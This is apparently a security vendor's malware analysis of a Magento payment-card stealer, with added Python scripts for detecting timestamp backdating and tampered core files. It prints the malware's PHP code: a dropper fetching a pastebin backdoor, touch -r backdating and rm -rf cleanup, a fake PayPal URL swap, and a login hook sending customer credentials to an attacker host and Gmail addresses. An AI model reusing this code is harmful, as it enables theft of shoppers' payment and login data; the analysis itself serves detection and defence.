Magento credit card stealer

Magento
Attackers are increasingly exploiting a package-upload vulnerability in the Magento Downloader (Magento Connect installer) to steal payment card information from e-commerce websites that use Magento, the most popular e-commerce platform, owned by eBay.

Magento Auto Logger & Patcher

First, the malware script tries to download patcher.zip:

### Start Patching ###
/* Download */
executebin('curl -O '.$linkpatch);

/* Extract */
if (file_exists($namepatch)) {
    echo "<br/>[+] $namepatch DOWNLOADED!";
} else {
    echo "<br/><font color=red>[!] $namepatch NOT FOUND!</font>";
    $backdoor = file_get_contents("http://pastebin.com/raw/[SECRET]");
    $backdoor_f = fopen($dir."/js/backup.php", "w");
    fwrite($backdoor_f, $backdoor);
    fclose($backdoor_f);
    echo "<br/>[+] Backdoor UPLOADED!";
}
@chmod($dir."/downloader/", 0777);
@unlink($dir."/downloader/index.php");
@unlink($dir."/downloader/backup.php");
executebin('unzip '.$namepatch);

If the download fails, it instead fetches a PHP command shell from pastebin and writes it to js/backup.php to keep remote access.

Logger Creator

### Logger Creator ###
$dir  = $_SERVER['DOCUMENT_ROOT'];
$b64  = "base"."64"."_"."de"."code";
$path = '/app/code/core/Mage';
$link = $b64('[SECRET]');

$path_a = $dir.$path.'/Payment/Model/Method/';
$name_a = 'Cc.php';
$file_a = 'Abstract.php';
$link_a = $link.'[SECRET]';
patch($path_a,$name_a,$file_a,$link_a);
echo "<br/>[+] Card Logger DONE!";
.
.
echo "<br/>[+] Customer Logger DONE!";
.
.
echo "<br/>[+] Admin Logger DONE!";
.
.
if($size_e == $size_d) {
        patch($path_d,$name_d,$file_d,$link_d);
        echo "<br/>[+] PayPal Direct Scam DONE!";
} elseif($size_e == '4096') {
        patch($path_d,$name_d,$file_d,$link_e);
        echo "<br/>[+] PayPal Direct Scam DONE!";
} else {
        echo "<br/><font color=red>[!] PayPal Direct Scam FAILED / ".$size_e."</font>";
}

Patch ShopLift

Then it tries to disable the old Magento ShopLift vulnerability (remote code execution, RCE) by deleting the affected admin controller:

/* Patch ShopLift */
@unlink($dir."/app/code/core/Mage/Adminhtml/controllers/Cms/WysiwygController.php");
echo "<br/>[+] ShopLift PATCHED!";

Touching Files

After that it touches almost all files, copying timestamps from existing files with touch -r, to hide which files were modified:

echo "<br/>[+] Touching Files";
executebin('touch -r cron.sh app/');
executebin('touch -r app/locale/ app/code/');
.
.
.
executebin('touch -r js/calendar/calendar.js js/calendar/calendar.php');
executebin('touch -r cron.sh xml.php');
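An added example, not part of the original analysis: `touch -r` copies the reference file's atime and mtime, but on Linux the inode change time (ctime) cannot be set from userland, and the utime() call that backdates mtime bumps ctime to the current time. Files whose ctime is far newer than their mtime are therefore candidates for this kind of backdating. The sample tree below is constructed in a temporary directory and assumes a POSIX filesystem (on Windows st_ctime is the creation time, so the check does not apply).

```python
import os
import tempfile
import time
from pathlib import Path

# Report files whose mtime is at least this much older than their ctime.
MIN_GAP_SECONDS = 3600.0


def backdate_like_touch_r(target: Path, reference_mtime: float) -> None:
    """Do what `touch -r REF TARGET` does: copy REF's atime/mtime onto TARGET.
    The kernel updates ctime to 'now' as a side effect, which is what we detect."""
    os.utime(target, (reference_mtime, reference_mtime))


def find_backdated_files(root: Path, min_gap: float = MIN_GAP_SECONDS) -> list:
    """Return paths (relative to root, POSIX style) whose ctime is newer than
    their mtime by at least min_gap seconds."""
    hits = []
    for path in sorted(root.rglob("*")):
        if path.is_file():
            st = path.stat()
            if st.st_ctime - st.st_mtime >= min_gap:
                hits.append(path.relative_to(root).as_posix())
    return hits


def build_sample_store(root: Path) -> None:
    """Constructed sample tree: freshly deployed legitimate files (ctime ~ mtime ~ now)
    plus one planted js/backup.php whose mtime is copied from an 'old' reference."""
    (root / "js").mkdir(parents=True)
    (root / "cron.sh").write_text("#!/bin/sh\n")
    (root / "js" / "calendar.js").write_text("// legitimate file\n")
    planted = root / "js" / "backup.php"
    planted.write_text("<?php /* constructed stand-in for the dropped shell */\n")
    # Stand-in for the reference file's mtime: one year in the past.
    backdate_like_touch_r(planted, time.time() - 365 * 86400)


def demo() -> list:
    """Build the sample tree in a temp dir and scan it."""
    root = Path(tempfile.mkdtemp(prefix="magento-ts-"))
    build_sample_store(root)
    return find_backdated_files(root)


if __name__ == "__main__":
    for rel in demo():
        print(f"[!] {rel}: ctime much newer than mtime (possible touch -r backdating)")
```

On a real store, run find_backdated_files() against the Magento document root and review the hits together with a checksum comparison against a clean copy of the same Magento release; the ctime gap alone says a timestamp was rewritten, not what was changed.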

Deleting and Cleaning

It then removes the downloaded patch archive to cover its tracks:

/* Delete */
executebin('rm -rf '.$namepatch);
if (file_exists($namepatch)) {
    echo "<br/><font color=red>[!] $namepatch FOUND!</font>";
} else {
    echo "<br/>[+] $namepatch DELETED!";
}

Paypal Model/Config.php

This modified getPaypalUrl() steals your payment information: if the visitor's IP is not already listed in the attacker's victims.txt, the PayPal URL is replaced with a fake one fetched from the attacker's server:

/**
     * PayPal web URL generic getter
     *
     * @param array $params
     * @return string
     */
    public function getPaypalUrl(array $params = array())
    {   
        $evil_destination = "http://socialplanners.com.mx/scammers/";
        $ip_korban = $_SERVER['REMOTE_ADDR'];
        $situs = $evil_destination."victims.txt";
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $situs);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_TIMEOUT,30);
        curl_setopt($ch, CURLOPT_POST, 1);
        $preg_view = curl_exec($ch);
        curl_close($ch);
        if(preg_match("#".$ip_korban."#", $preg_view)) {
            return sprintf('https://www.%spaypal.com/cgi-bin/webscr%s',
                $this->sandboxFlag ? 'sandbox.' : '',
                $params ? '?' . http_build_query($params) : ''
            );
        } else {
            $situs = $evil_destination."url.txt";
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $situs);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_TIMEOUT,30);
            curl_setopt($ch, CURLOPT_POST, 1);
            $paypal_fake = curl_exec($ch);
            curl_close($ch);
            return sprintf($paypal_fake,
                $this->sandboxFlag ? 'sandbox.' : '',
                $params ? '?' . http_build_query($params) : ''
            );  
        }
    }

Customer/Model/Session.php

This modified login() steals customer login data and forwards it to the attackers' gmail.com accounts:

email: kosowar8@gmail.com
email: 1v4n.1v4n4usqu1@gmail.com

/**
     * Customer authorization
     *
     * @param   string $username
     * @param   string $password
     * @return  bool
     */
    public function login($username, $password)
    {
        /** @var $customer Mage_Customer_Model_Customer */
        $customer = Mage::getModel('customer/customer')
            ->setWebsiteId(Mage::app()->getStore()->getWebsiteId());
        if ($customer->authenticate($username, $password)) {
            $srv = $_SERVER['HTTP_HOST'];
            $ips = $_SERVER['REMOTE_ADDR'];
            $uag = $_SERVER['HTTP_USER_AGENT'];
            $getip = 'http://ip-api.com/json/' . $ips;
            $curl = curl_init();
            curl_setopt($curl, CURLOPT_URL, $getip);
            curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
            $content = curl_exec($curl); curl_close($curl);
            $details = json_decode($content);
            $country_codes = $details->countryCode;
            if(empty($country_codes)) { $country_code = "XX"; } else { $country_code = $country_codes; }
            $country_name = $details->country;
            $chksrv = "http://socialplanners.com.mx/mail_chk/";
            $chkmail = file_get_contents($chksrv."?e=$username&p=$password");
            if($chkmail == "") { $mailchk = "Unknown"; } else { $mailchk = $chkmail; }
            $chkvalid = file_get_contents($chksrv."valid.php?email=$username&pass=$password");
            if($chkvalid == "") { $ppchk = "Unknown"; } else { $ppchk = $chkvalid; }
            $id  = "ba"."se"."64"."_"."de"."co"."de";
            $db  = "ma"."il";
            $key = $id("a29zb3dhcjhAZ21haWwuY29tLDF2NG4uMXY0bjR1c3F1MUBnbWFpbC5jb20=");
            $auth = "Account :  ".$username."|".$password."\nInfo : ".$ppchk." PayPal - ".$mailchk." Email\n\nIP Info :  ".$ips." | ".$country_name." On ".date('r')."\nBrowser :  ".$uag."\nSite :  ".$srv."";
            $subjk = "".$ppchk." PayPal - ".$mailchk." Email [".$srv." - ".$ips."]";
            $headr = "From: ".$country_code." User <".$username.">";
            $db($key, $subjk, $auth, $headr);
            $this->setCustomerAsLoggedIn($customer);
            $this->renewSession();
            return true;
        }

        return false;
    }
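The indicators this analysis surfaces can be checked mechanically: core model files that suddenly make outbound requests or send mail, function names assembled from string fragments ("ma"."il"), functions invoked through a variable ($db(...)), a PHP file dropped under js/, the deleted WysiwygController.php, and a PayPal URL whose sprintf() format string is fetched at runtime. The scanner below is an added example written for this post, not code from Malware Expert or Magento. The two store trees are constructed in-memory stand-ins modelled on the snippets above; attacker.invalid and the base64 argument are placeholders, not the real values.

```python
import re
from typing import Dict, List

# Function names an attacker hides by splitting them into fragments ("ma"."il").
SENSITIVE_FUNCTIONS = {"base64_decode", "mail", "eval", "system", "shell_exec", "passthru"}
# Core model files that have no business making outbound requests or sending mail.
NO_NETWORK_CORE_FILES = {
    "app/code/core/Mage/Customer/Model/Session.php",
    "app/code/core/Mage/Payment/Model/Method/Cc.php",
    "app/code/core/Mage/Payment/Model/Method/Abstract.php",
    "app/code/core/Mage/Paypal/Model/Config.php",
}
DROPPED_SHELL = "js/backup.php"  # where the dropper writes its PHP shell
DELETED_CORE_FILE = "app/code/core/Mage/Adminhtml/controllers/Cms/WysiwygController.php"

NETWORK_CALL = re.compile(r"\b(curl_init|curl_exec|fsockopen|mail|file_get_contents)\s*\(")
CONCAT_CHAIN = re.compile(r"""(?:(['"])[A-Za-z0-9_]{1,6}\1\s*\.\s*)+(['"])[A-Za-z0-9_]{1,6}\2""")
FRAGMENT = re.compile(r"""['"]([A-Za-z0-9_]{1,6})['"]""")
VARIABLE_CALL = re.compile(r"\$([A-Za-z_]\w*)\s*\(")       # $db(...) calls a function by name
SPRINTF_FROM_VARIABLE = re.compile(r"\bsprintf\s*\(\s*\$")  # format string decided at runtime


def scan_php_source(path: str, source: str) -> List[str]:
    """Heuristic indicators for one PHP file; returns human-readable findings."""
    findings = []
    if path in NO_NETWORK_CORE_FILES:
        for name in sorted(set(NETWORK_CALL.findall(source))):
            findings.append(f"{path}: {name}() in a core model file")
        if SPRINTF_FROM_VARIABLE.search(source):
            findings.append(f"{path}: sprintf() format string comes from a variable")
    for chain in CONCAT_CHAIN.finditer(source):
        joined = "".join(FRAGMENT.findall(chain.group(0)))
        if joined in SENSITIVE_FUNCTIONS:
            findings.append(f"{path}: '{joined}' assembled from string fragments")
    for var in sorted(set(VARIABLE_CALL.findall(source))):
        findings.append(f"{path}: function invoked through variable ${var}()")
    return findings


def scan_store(files: Dict[str, str]) -> List[str]:
    """files maps paths relative to the Magento root to their contents."""
    findings = []
    if DROPPED_SHELL in files:
        findings.append(f"{DROPPED_SHELL}: PHP file inside js/ (dropper's shell location)")
    if DELETED_CORE_FILE not in files:
        findings.append(f"{DELETED_CORE_FILE}: missing (deleted by the ShopLift 'patch')")
    for path in sorted(files):
        if path.endswith(".php"):
            findings.extend(scan_php_source(path, files[path]))
    return findings


# Constructed samples modelled on the snippets in this post (not real store files).
CLEAN_CONFIG = """public function getPaypalUrl(array $params = array()) {
    return sprintf('https://www.%spaypal.com/cgi-bin/webscr%s',
        $this->sandboxFlag ? 'sandbox.' : '',
        $params ? '?' . http_build_query($params) : '');
}
"""
INFECTED_CONFIG = """public function getPaypalUrl(array $params = array()) {
    $ch = curl_init();  // attacker.invalid is a constructed placeholder host
    curl_setopt($ch, CURLOPT_URL, "http://attacker.invalid/url.txt");
    $paypal_fake = curl_exec($ch);
    return sprintf($paypal_fake, $this->sandboxFlag ? 'sandbox.' : '', '');
}
"""
CLEAN_SESSION = """public function login($username, $password) {
    $customer = Mage::getModel('customer/customer');
    if ($customer->authenticate($username, $password)) {
        $this->setCustomerAsLoggedIn($customer);
        return true;
    }
    return false;
}
"""
INFECTED_SESSION = """public function login($username, $password) {
    $customer = Mage::getModel('customer/customer');
    if ($customer->authenticate($username, $password)) {
        $id  = "ba"."se"."64"."_"."de"."co"."de";
        $db  = "ma"."il";
        $key = $id("cGxhY2Vob2xkZXI=");  // placeholder, not the real recipients
        $db($key, "subject", $username . "|" . $password, "From: " . $username);
        $this->setCustomerAsLoggedIn($customer);
        return true;
    }
    return false;
}
"""
CLEAN_STORE = {
    "app/code/core/Mage/Paypal/Model/Config.php": CLEAN_CONFIG,
    "app/code/core/Mage/Customer/Model/Session.php": CLEAN_SESSION,
    DELETED_CORE_FILE: "<?php class Mage_Adminhtml_Cms_WysiwygController {}\n",
}
INFECTED_STORE = {
    "app/code/core/Mage/Paypal/Model/Config.php": INFECTED_CONFIG,
    "app/code/core/Mage/Customer/Model/Session.php": INFECTED_SESSION,
    DROPPED_SHELL: "<?php /* placeholder for the dropped shell */\n",
}

if __name__ == "__main__":
    for finding in scan_store(INFECTED_STORE):
        print("[!]", finding)
```

To run it against a live store, build the dict by walking the document root and reading each .php file; the checks are deliberately heuristic, so treat a hit as a pointer to diff that file against the same file from a clean copy of the installed Magento release rather than as proof of compromise.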

Final words

Websites that use Malware Expert – ModSecurity rules are protected against this threat.

Use Malware Expert – Signatures detect these malware files for FREE!